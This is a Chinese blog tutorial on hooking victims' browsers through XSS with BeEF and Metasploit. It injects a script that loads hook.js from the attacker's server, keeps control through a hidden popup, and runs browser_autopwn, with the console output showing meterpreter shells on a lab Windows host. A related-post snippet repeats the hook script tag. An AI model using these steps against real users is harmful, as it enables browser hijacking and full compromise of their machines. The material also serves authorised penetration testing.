秒杀Xsser.me的渗透工具Beef

最新推荐文章于 2024-03-18 09:44:00 发布
最新推荐文章于 2024-03-18 09:44:00 发布
阅读量4.7k 收藏 5
点赞数 1
分类专栏: 网络

http://www.myhack58.com/Article/html/3/8/2013/36603.htm

 1.什么是Beef

Beef是一个强大的Xss专业安全工具,不像其他的Xss渗透测试工具,Beef可以利用各种Exploit对浏览器进行渗透测试,并且设有对Metasploit的接口,利用msf丰富的漏洞资源进行安全评估。

2.如何安装Beef

具体安装的方法不多说了,详情请看我的偶像Dis9Team炊少的文章  http://fuzzexp.org/metasploit-and-beef-the-tutorial-chinese.html

3.利用Beef进行渗透测试

首先运行beef并且和msf衔接

1 msfconsole -r ./test/thirdparty/msf/unit/BeEF.rc

找到Xss利用的地方 插入我们的攻击代码 js的话Beef给了默认的js  http://yourip:3000/hook.js 就用这个js吧!

当对方触发了攻击代码  我们的控制端便会出现类似主机上线的画面

 

在图中我们可以清楚的了解到 对方的操作系统是windows2003  浏览器是ie6.0    cookie以及中招的页面 (盲打你懂得)

我们可以发送各种命令给在线的主机  点击进入Command界面

为了控制的时间更长一些 我们可以发送一个命令让右下角悄悄的弹一个小窗 即使对方关闭网页 小窗还在 还是可以控制


我们还可以调用各种浏览器漏洞来攻击

下面 我们测试一下

使用msf自带的浏览器自动攻击脚本

1 msf > use server/browser_autopwn
2 msf auxiliary(browser_autopwn) > set uripath /
3 uripath => /
4 msf auxiliary(browser_autopwn) > set lhost 192.168.128.132
5 lhost => 192.168.128.132
6 msf auxiliary(browser_autopwn) > run
7 [*] Auxiliary module execution completed
8  
9 [*] Setup
10 [*] Obfuscating initial javascript 2012-12-15 00:31:20 -0800
11 msf auxiliary(browser_autopwn) > [*] Done in 0.986208467 seconds
12  
13 [*] Starting exploit modules on host 192.168.128.132...
14 [*] ---
15  
16 [*] --- Done, found 26 exploit modules
17  
18 [*] Using URL: http://0.0.0.0:8080/
19 [*] Local IP: http://192.168.128.132:8080/
20 [*] Server started.
21  
22 sessions
23  
24 Active sessions
25 ===============
26  
27 Id Type Information Connection
28  -- ---- ----------- ----------
29  1 meterpreter x86/win32 DELL-3C52E6EC1C\Administrator @ DELL-3C52E6EC1C 192.168.128.132:3333 -> 192.168.128.129:2363 (192.168.128.129)
30  2 meterpreter x86/win32 DELL-3C52E6EC1C\Administrator @ DELL-3C52E6EC1C 192.168.128.132:3333 -> 192.168.128.129:2364 (192.168.128.129)
31  
32 msf auxiliary(browser_autopwn) >

我们从界面中看到目标还安装了java等等 可以根据各种信息结合msf来进行渗透测试  包括测试一些已知的溢出漏洞等等

具体的EXP可以看Commands里面的介绍  有很多   甚至有一个是利用IOS 的Safari 给他人打电话!  LoL!


mydriverc2
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
-xsser.me-:XSS平台
03-23
-xsser.me-:XSS平台源码
使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell
热门推荐
MickeyMouse1928的博客
04-08 2万+
利用Beef劫持客户端浏览器   环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.114.204) 3. 客户端(用于访问web服务器,IP:192.168.114.130) 步骤: 1. Kali使用beef生成恶意代码 2. 将恶意代码写入192.168.114.2
beef工具-01】神器beef的安装与简介
m0_64378913的博客
06-01 7008
目录1 beef概述1 beef简介1.2 beef2 beef安装3 beef的重要网址4 简单测试5 总结参考文章 1 beef概述 1 beef简介 BeEF 是浏览器开发框架的缩写。 它是一款专注于网络浏览器的渗透测试工具。 随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况。 与其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器。
XSSER:一款强大而灵活的XSS攻击工具
最新发布
gitblog_00030的博客
03-18 417
XSSER:一款强大而灵活的XSS攻击工具 XSSER 是一个功能强大的自动化跨站脚本(XSS)攻击工具,旨在帮助网络安全研究人员、渗透测试人员和开发人员发现并利用XSS漏洞。 XSSER的特点与功能 自动化:XSSER能够自动扫描目标网站上的XSS漏洞,并生成相应的payload进行验证。 灵活定制:支持自定义多种参数,如HTTP方法、请求头、payload等,以满足不同场景的需求。 多种攻击...
Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)
网络安全领域___专研者.
03-18 3790
XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
一个好玩的工具BeEF介绍
luluoluoa的博客
05-07 1743
beef BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能 BeEF-XSS可以说是最强大的XSS漏洞利用工具,可以收集浏览器信息、键盘记录、社会工程等 总之就是使用beef这个工具来利用xss漏洞的 beef安装 我在kail虚拟机上安装的,很简单的在终端输入一句命令sudo apt setup beef-xss,然后安装成功设置密码就行了,因为之后在浏览器打开需要登陆,登陆名beef,密码就是安装时设置的那个 beef打开 在终端输入命令beef
BEEF的简介与使用
永远是少年
10-31 1908
今天继续给大家介绍渗透测试相关知识,本文主要内容是BEEF的简介与使用。 一、BEEF简介 二、BEEF渗透测试实战
XSser.me搭建手册
06-24
XSser.me搭建手册,xsser.me是一款xss评估测试工具,可以方便的进行黑盒安全测试和进行安全培训的演示等。
修改版xsser.me
06-24
xsser.me是一款xss评估测试工具,可以方便的进行黑盒安全测试和进行安全培训的演示等等。修改版xsser.me,你懂~
xsser测试平台
12-30
配合phpstudy工具搭建了xsser.me平台,主要用于检测xss漏洞,并对其进行利用
XSS平台源码(xsser.me)
12-27
XSS平台源码(xsser.me)
XSS漏洞利用工具BeEF
RockHan
11-06 305
BeEF是Browser Exploitation Framework的缩写。随着人们越来越多地关注针对包括移动客户端在内的客户端的网络传播攻击,BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性。BeEF将钩挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,...
Beef工具使用
wo41ge的博客
02-22 1万+
今天写一下这个工具Beef 我这里用kali 启动Apache:service apache2 start 然后安装Beef工具 我用脚本安装 命令: apt-get update apt-get install beef-xss apt-get install beef-xss beef-xss 启动之后 Hook: <script src="http://<IP>:3000/hook.js"></script> 会弹出来beef的登录窗口 这边我们在看一下bee
Beef安装与简单使用
abg49988的博客
11-06 2000
安装 Debian / Ubuntu 安装依赖 sudo apt-get update sudo apt-get install curl git curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash ...
webwell安全工具-BeEF
凯歌响起的博客
09-05 1845
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。​ BeEF主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行。
kali,beef-xss安装及使用
m0_73581247的博客
06-22 1242
1.Beef工具 1.1 Beef工具介绍   Beef是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; Beef是基于Ruby语言编写的,并且支持图形化界面,操作简单。   新版的kail已经不自带beef工具了,需要自己下载。并且目前只支持macos和Linux系统。1.2 Beef工具安装   在安装beef工具之前建议更新一下源   apt-get update   apt-get install beef-xss 时间比较久,可以去放松一会   启
BeEF的基本操作
Kali与编程
12-19 1040
注入BeEF的目标是渗透测试人员在评估目标系统安全性时的重要步骤,它允许渗透测试人员模拟真实的攻击场景,并发现目标系统中存在的漏洞和弱点。一旦注入成功,你可以通过BeEF的Web界面与目标浏览器进行交互,并执行更多的攻击,如获取敏感信息、执行远程代码等。BeEF是一个强大的工具,它可以利用浏览器的漏洞和弱点,实现对目标系统的攻击。例如,你可以使用BeEF的会话劫持功能,将被攻击的浏览器会话重定向到一个伪造的登录页面。请注意,本文仅介绍了注入BeEF的目标的方法和示例,以便加深对该工具的理解。
渗透测试工具:跨站脚本漏洞检测---Xsser
gao646467783的博客
01-27 3475
文章目录简介:用法:(一)、Options:(二)、特别的用法:(三)、选择目标:(四)、 现测HTTP/HTTPS的连接类型:(五)、 配置请求:(六)、 系统验校器:(七)、 选择攻击向量(s):(八)、选择Bypasser(s):(九)、 特殊的技巧:(十)、 Select Final injection(s):(十一)、 Special Final injection(s):(十二)、 混杂模式:(十三)、 Reporting:(十四)、Miscellaneous: 简介: 跨站脚本者是一个自动框架
利用Beef劫持被攻击者客户端浏览器。用DVWA+SQLmap+Mysql进行SQL注入实战。
yellowO的博客
12-24 1812
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。系统环境:Kali Linux 2、Windows Server网络环境:交换网络结构实验工具Beef;SqlMAP;DVWA实验环境搭建。角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
渗透测试工具xsser csdn
12-04
渗透测试工具XSSer CSDN是一款专门用于检测网站跨站脚本漏洞的工具。它具有快速、准确、易用的特点,可以帮助安全测试人员快速定位和修复网站中存在的漏洞。 XSSer CSDN可以通过模拟黑客攻击的方式,检测网站中是否...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值